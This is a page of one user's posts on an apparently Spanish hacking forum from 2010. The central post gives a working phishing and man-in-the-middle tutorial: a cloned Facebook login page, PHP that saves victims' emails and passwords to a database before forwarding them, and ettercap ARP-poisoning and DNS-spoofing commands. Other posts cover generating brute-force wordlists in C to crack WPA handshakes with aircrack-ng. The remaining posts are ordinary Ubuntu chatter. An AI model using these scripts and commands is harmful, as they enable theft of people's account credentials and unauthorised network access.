Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - dazoverride

#11
Hacking / Re: fakeFacebook
24 Diciembre 2010, 16:37 PM
Por cierto haber si alguien me soluciona el problema :P tiene un pequeño fallito el procedimiento :P

La questión es... hago el dns_spoof para que vaya a mi servidor en vez de a facebook real, con la copia de facebook o lo que sea, pero al hacer el dns_spoof, la víctima se queda en mi servidor y no puedo redirigirlo al facebook real :P ya que se me queda spoofeado en mi servidor y de ahí no sale jajaj vamos que una vez spoofeado no me deja ir a facebook. Alguna solución? A mi lo único que se me ocurre es reenviarlo a un html con un mensaje de error y avan.... pero ya pierde la gracia porque no te redirije al facebook logueado...
#12
Hacking / Re: fakeFacebook
24 Diciembre 2010, 16:21 PM
Cita de: fujiyaro en 23 Diciembre 2010, 02:00 AM
Esta bien y muy currado, pero a mi parecer es más fácil hacerlo sin necesidad de montar un servidor i acer un dns_spoof.
Con el mismo ettercap y sslstrip puedes montar un arp_poisoning y para tu fin te dara el mismo resultado, pero más fácil y commutable con todas las web.

PD: me gusto tu sistema.
Gracias :D  :P
Haber si, está claro que con un simple ettercap + sslstrip seria más fácil y mas rápido, pero el camino difícil es más divertido, y no se... ademas fue una idea que se me ocurrió y pues ahora que tengo un nivel de programacion mas alto pues me dió por hacerlo y ya que no he aportado nada mas que tonterias por aquí pos me apetecia subir algo decente...

No se, quiza no me he explicado muy bien, pero vamos, que está el codigo del index.php y el insert_into.php que creo que es lo mas "difícil", la verdad.


Cita de: dvdr en 20 Diciembre 2010, 11:19 AM
yo soy un poco torpe bueno bastante torpe ....esto lo puedes poner con imagenes de cada paso y aparte como lanzarlo

en el 2 paso ya me perdi porque lo e cojido de synaptyc ...¡¡¡talvez no lo deberia aver cojido de hay
salu2


nose cual es el apropiado http://www.phpmyadmin.net/home_page/downloads.php
ufff... que dolor a la vista, porfavor... es el primer enlace que te da google si pones phpMyAdmin!!!!!!! y si no sabes cual poner buscalo en google... ademas he puesto como se instala el LAMP y todo, no se la verdad esque me esperaba cualquier pregunta menos esa.... Esque me siento ofendido enserio... XD

Mirad he publicado esto para que podamos aprender todos, no para sacar passwords de facebook, el fallo es mio por llamarlo asi.....

#13
Hacking / fakeFacebook
20 Diciembre 2010, 04:46 AM
Vamos a crear un servidor LAMP, y falsear facebook (mientras la victima piensa que entra en facebook, en realidad entra en nuestro servidor apache) para que al ingresar las contraseñas queden grabadas en nuestra base de datos, tambien deberemos hacer un dns_spoof a la victima...

Sirve para cualquier web cambiando un par de parametros pero el ejemplo lo he hecho con facebook

1- Instalamos la base de datos:
sudo aptitude install php5 mysql-server libapache2-mod-auth-mysql php5-mysql phpmyadmin

2- Descargamos el phpMyAdmin lo descomprimimos y lo metemos en /var/www/

3- Configuramos la base de datos y creamos una base de datos llamada XXX con una tabla Passwords con tres campos que seran id, user, pass

Bien ya tenemos la base de datos configurada, ahora un poco de php.

4- Copiamos el index de facebook y lo metemos en nuestro servidor web,  /var/www/index.php
En este archivo debemos cambiar el action del <form id="login_form">
Citar
<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="NLumB" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="es_ES" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Correo electrónico</label></td><td class="html7magic"><label for="pass">Contraseña</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" />.................

debemos poner este php como action dejando igual todo lo demas--> form method="POST" action="insert_into.php"

5-ponemos este insert_into.php en /var/www/
Citar
<?php
$conn=mysql_connect("127.0.0.1","userBaseDeDatos","passBaseDeDatos");
$err_db=mysql_select_db("XXX");

$usuario=$_POST['email'];
$contra=$_POST['pass'];

$sql="insert into Passwords (user, pass) values ('$usuario', '$contra')";
if ( ! $resul=mysql_query($sql,$conn))
{
   exit;
}
mysql_close();
//header ("Location: https://login.facebook.com/login.php?login_attempt=1");
?>

<html><head></head><body>
<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)">
   <input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є">
   <input type="hidden" name="lsd" value="LzdnF" autocomplete="off">
   <input type="hidden" id="locale" name="locale" value="es_ES" autocomplete="off">
   <?php
      echo '<input type="hidden" class="inputtext" name="email" id="email" tabindex="1" value='.$usuario.'>';
      echo '<input type="hidden" class="inputtext" name="pass" id="pass" tabindex="2" value='.$contra.'>';
   ?>
   <!--<input value="Entrar" tabindex="4" type="submit">  -->
   <input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є">
   <input type="hidden" id="lsd" name="lsd" value="LzdnF" autocomplete="off">
   <script language="javascript" type="text/javascript">
      <!--
         document.getElementById('login_form').submit();
      //-->
   </script>
</form>
</body></html>

Bueno, por fin lo tenemos todo preparado, solo nos falta la ayuda de ettercap.

6-Configuramos el /usr/share/ettercap/etter.dns y ejecutamos ettercap
Citarsudo echo *.facebook.*      A    TuIP > /usr/share/ettercap/etter.dns
sudo echo www.facebook.*      A    TuIP >> /usr/share/ettercap/etter.dns
sudo echo www.facebook.com      A    TuIP >> /usr/share/ettercap/etter.dns
sudo echo www.facebook.es      A    TuIP >> /usr/share/ettercap/etter.dns
sudo ettercap -T -q -i eth0 -M arp:remote -P dns_spoof // /ipRouter/

Bueno... vaya sermón he soltado.... Espero que sirva para aprender y disculpad que no me explique muy bien :S

SALUDOS!!!!
#14
-Porque cosas pequeñas hacen cosas grandes :D
-Como ya han dicho, es imparcial, hace lo que tu le pides.
-Porque creo que actualmente, si no tienes una base de informática, estas perdido.
-Por el "anonimato" en la red.
-Porque prefiero estrujarme la cabeza con un dichoso ordenador que vaciarme la cabeza con la maldita tele.
-Porque cuanto más sé de informática mas me gusta.


Saludos!
#15
Mi problema es que tengo un diccionario que he creado en c, lo he compilado y me a sacado el a.out ejecutable, vale, pues quiero que el diccionario corra directamente como argumento de aircrack-ng para no tener que crear el diccionario, simplemente que mientras van saliendo las palabras del a.out me las vaya analizando como si fuera un diccionario. Me explico? supongo que sera posible. Ahh! el diccionario es normal y corriente, simplemente muestra palabras separadas por "\n" o saltos de linea.

Saludos! haber si podéis hecharme una manita ;)
#16
Yo también lo tengo instalado, todo perfecto, algún problemilla al intentar instalar wicd... de momento me quedo con el gestor de red default... muy bonito lo del chat, y también está bien el centro de software de ubuntu el cual está muy bien organizado con lo de "que hay de nuevo " y "recomendados". Inicia muy rapido y las fuentes que tiene el sistema son buenas, como unica pega diré que ubuntu 9.10 para mi a sido la mejor, la más estable...

Saludos!!
#17
mejor si te creas tu un diccionario propio... por ejemplo de numeros de 6 cifras:

dic.c
------
#include studio.h
long i=0;
while(i<999999)
{
printf("%l",i);
i++;
}

------

gcc dic.c

./a.out > dic

ale... ya tienes diccionario con 6 cifras de numeros. puedes añadir mas caracteres x ejemplo '-' o '_' y yo tengo hechos de todos los caracteres posibles, de solo mayusculas....etc

Espero que sea de ayuda
#18
Si funciona! lo que me parecia muy raro que no salieran los simbolos esos mientras comprueba, como hace con otros diccionarios.
#19
como no sea el .cap generado por airodump....
#20
No estoy seguro de que el tema esté bien aquí, quiza deberia ir en programacion o en hacking wireles... ante la duda lo he puesto aquí. :P

El problema que tengo es que he hecho un programa en c que crea un diccionario de 6 cifras y el aircrack no me lo coge.

El programa simplemente genera printf linea a linea los caracateres que quiero (del codigo ascci 32 al 126) y cada "palabra" esta separado por un printf("\n"). lo que hago es ejecutarlo y redireccionarlo a un archivo, por lo tanto el diccionario supongo que estará bien creado ya que aparentemente queda igual que cualquier otro, palabras separadas por saltos de linea.
Formato del diccionario resumido(coge todas las combinaciones posibles de 6 caracteres):
a
b
c
aa
ab
ac
aaa
aab
...

lo normal seria...
Citar

root@XXX:~/Escritorio$ aircrack-ng -w nombres_hombre.txt *.cap
Opening xxx-01.cap
Read 119095 packets.

   #  BSSID              ESSID                     Encryption

   1  xx:xx:xx:xx:xx  xxx                    WPA (1 handshake)

Choosing first network as target.

Opening xxx.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1


                   [00:00:00] 552 keys tested (715.80 k/s)


                       Current passphrase: waverley                   


      Master Key     : A3 EC 1F AB 23 47 B4 F6 20 3B 76 E5 C0 31 9E F1
                       07 0A 2B 27 66 3F B7 7B 28 48 8C E2 9F 80 F7 75

      Transient Key  : 62 7C 88 BB BA 37 D1 F5 15 4F AC 9F AB 6F 2D 9C
                       7E 97 0E DB F7 EE E6 5C 49 06 3D D8 17 D1 2B E3
                       20 EE 90 8F 40 42 33 AF 2A 7A 3E 62 65 61 91 05
                       CE 0B D5 35 1C 97 4B 57 4C 04 64 2A 73 CA A2 88

      EAPOL HMAC     : 61 C4 85 34 63 36 7B D5 C0 9C 3E 4C C2 B7 A9 34

Passphrase not in dictionary


pero lo que me ocurre es esto...
Citar

root@XXX:~/Escritorio$ aircrack-ng -w dic *.cap
Opening xxx-01.cap
Read 119095 packets.

   #  BSSID              ESSID                     Encryption

   1  xx:xx:xx:xx:xx  xxx                    WPA (1 handshake)

Choosing first network as target.

Opening xxx-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1
Passphrase not in dictionary



Quitting aircrack-ng...



alomejor si que me pasa el diccionario pero no me muestra por pantalla los numeros esos...

Bueno que opinais? espero alguna respuesta ;)